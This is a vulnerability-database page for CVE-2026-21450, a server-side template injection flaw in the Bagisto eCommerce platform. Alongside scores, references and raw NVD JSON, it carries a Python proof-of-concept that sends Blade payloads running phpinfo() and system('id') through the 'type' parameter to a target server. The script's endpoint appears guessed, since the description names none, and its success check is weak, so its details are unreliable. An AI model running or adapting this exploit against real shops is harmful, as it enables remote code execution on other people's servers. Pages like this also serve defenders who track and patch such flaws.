CVE-2026-21450

Description

Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:* - VULNERABLE

Bagisto < 2.3.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-21450 PoC - Bagisto SSTI to RCE
# Target: Bagisto versions < 2.3.10

target_url = "http://target.com"

# SSTI payload to execute system commands via Blade template injection
# This payload uses Blade's {!! !!} syntax to execute PHP code
ssti_payload = "{!! phpinfo() !!}"

# Alternative RCE payload
rce_payload = "{!! system('id') !!}"

# Step 1: Identify vulnerable endpoint with type parameter
vulnerable_path = "/api/products"
params = {
    "type": ssti_payload
}

print(f"[*] Sending SSTI payload to {target_url}{vulnerable_path}")
print(f"[*] Payload: {ssti_payload}")

try:
    response = requests.get(
        f"{target_url}{vulnerable_path}",
        params=params,
        timeout=10
    )
    
    if "PHP Version" in response.text or "system" in response.text:
        print("[+] Vulnerability confirmed! SSTI successful")
        print("[*] Server executed the injected PHP code")
    else:
        print("[-] No obvious SSTI response detected")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Note: Replace target_url with actual Bagisto instance URL
# The vulnerable parameter 'type' is processed by Blade template engine
# without proper sanitization, allowing PHP code execution

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21450
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21450
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21450/
[4] VulDB https://vuldb.com/cve/CVE-2026-21450
[5] https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21450", "sourceIdentifier": "[email protected]", "published": "2026-01-02T21:16:02.797", "lastModified": "2026-01-08T21:20:38.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue."}, {"lang": "es", "value": "Bagisto es una plataforma de comercio electrónico laravel de código abierto. Las versiones anteriores a la 2.3.10 son vulnerables a la inyección de plantillas del lado del servidor a través del parámetro type, lo que puede conducir a la ejecución remota de código o a otra explotación. La versión 2.3.10 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.10", "matchCriteriaId": "E9A19FD0-5100-48D6-BBB3-5A4CA1D90593"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-9hvg-qw5q-wqwp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}